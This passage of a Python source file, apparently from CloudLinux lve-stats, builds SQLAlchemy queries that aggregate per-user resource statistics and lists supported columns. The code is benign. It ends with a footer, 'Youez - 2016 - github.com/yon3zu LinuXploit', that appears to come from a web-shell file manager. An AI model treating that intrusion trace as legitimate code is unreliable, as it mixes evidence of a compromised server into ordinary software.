        self.log.debug(str(query.compile(compile_kwargs={"literal_binds": True})).replace('\n', ' '))
        result = self.dbengine.execute(query).fetchall()[0]
        self.log.debug('query time: %s', time.time() - time_start)
        create_min, create_max = result
        if create_max is not None:
            return create_min - self.AGGREGATE_PERIOD + 1, create_max  # "+1" for exclude from timestamp
        else:
            return result

    # rewrite average function generating
    def _aggregate_fun_case(self, item):
        """
        :type item: str
        """
        if item in FIELD_AVERAGE:
            column_name = FIELD_TO_TABLE_COLUMN[item]
            table_column = getattr(self.table.c, column_name)
            return label(column_name, table_column * self.table.c.time)
        else:
            return _HistoryShowX1._aggregate_fun_case(self, item)


class HistoryShowUnion(HistoryShow):
    """
    Class for retrieve statistics data using two tables
    """

    def __init__(self, *args, **kwargs):
        HistoryShow.__init__(self, *args, **kwargs)
        self._alias = LVE_STATS_2_TABLENAME_PREFIX + 'union'
        kwargs.update({"time_count": self.time_count})
        self.x60 = _HistoryShowX60(*args, **kwargs)
        self.x1 = _HistoryShowX1(*args, **kwargs)
        self._need_union = self.x60.period_to is not None and self._is_multi_uids  # detect need union tables
        if self._need_union:
            self.table = self._select_union_query()

    # rewrite '_aggregate_fun_case' for correct calculate maximum
    def _aggregate_fun_case(self, item):
        """
        :type item: str
        """
        if self._need_union and item in FIELD_MAX:
            column_name = FIELD_TO_TABLE_COLUMN[item]
            column_name_limit = FIELD_TO_TABLE_COLUMN[FIELD_LIMIT[FIELD_MAX.index(item)]]
            column_name_fault = FIELD_TO_TABLE_COLUMN[FIELD_FAULT[FIELD_MAX.index(item)]]
            column_limit = getattr(self.table.c, column_name_limit)
            column_fault = getattr(self.table.c, column_name_fault)
            column_max = getattr(self.table.c, column_name + '_max')
            fun_ = self._fun_max(column_max, column_limit, column_fault)
            return fun_
        else:
            return HistoryShow._aggregate_fun_case(self, item)

    def _select_union_query(self):
        """
        union two tables
        """
        with warnings.catch_warnings():
            warnings.simplefilter("ignore", category=sa_exc.SAWarning)
            union_query = self.x1.select_query().where(
                not_(self.x1.table.c.created.between(self.x60.period_from, self.x60.period_to))
            )
            union_query = union_query.union_all(self.x60.select_query())
            union_query = alias(union_query, self._alias)
        return union_query

    def select_query(self, columns_=None, need_join=None):
        if self._need_union:
            return select(columns_)
        else:
            return HistoryShow.select_query(self, columns_=columns_, need_join=need_join)


def get_supported_columns(lve_version=None, mode=None):
    """
    preparation list columns depending of the lve version
    :type mode: Union[None, str]
    :type lve_version: Union[None, int]
    """
    columns = []
    if mode == 'v1':
        columns = [
            'aCPU',
            'mCPU',
            'lCPU',
            'aEP',
            'mEP',
            'lEP',
            'aVMem',
            'mVMem',
            'lVMem',
            'VMemF',
            'EPf',
            'aPMem',
            'mPMem',
            'lPMem',
            'aNproc',
            'mNproc',
            'lNproc',
            'PMemF',
            'NprocF',
            'aIO',
            'mIO',
            'lIO',
        ]
        if lve_version is None or lve_version > 6:
            columns.extend(['aIOPS', 'mIOPS', 'lIOPS'])
    elif mode == 'v2':
        columns = [
            'aCPU',
            'lCPU',
            'CPUf',
            'aEP',
            'lEP',
            'EPf',
            'aVMem',
            'lVMem',
            'VMemF',
            'aPMem',
            'lPMem',
            'PMemF',
            'aNproc',
            'lNproc',
            'NprocF',
            'aIO',
            'lIO',
            'IOf',
        ]
        if lve_version is None or lve_version > 6:
            columns.extend(['aIOPS', 'lIOPS', 'IOPSf'])
    elif mode is None:  # show all columns, v1 and v2
        columns = [
            'aCPU',
            'uCPU',
            'mCPU',
            'lCPU',
            'CPUf',
            'aEP',
            'uEP',
            'mEP',
            'lEP',
            'EPf',
            'aVMem',
            'uVMem',
            'mVMem',
            'lVMem',
            'VMemF',
            'aPMem',
            'uPMem',
            'mPMem',
            'lPMem',
            'PMemF',
            'aNproc',
            'uNproc',
            'mNproc',
            'lNproc',
            'NprocF',
            'aIO',
            'uIO',
            'mIO',
            'lIO',
            'IOf',
        ]
        if lve_version is None or lve_version > 6:
            columns.extend(['aIOPS', 'mIOPS', 'uIOPS', 'lIOPS', 'IOPSf'])
    return columns

Youez - 2016 - github.com/yon3zu
LinuXploit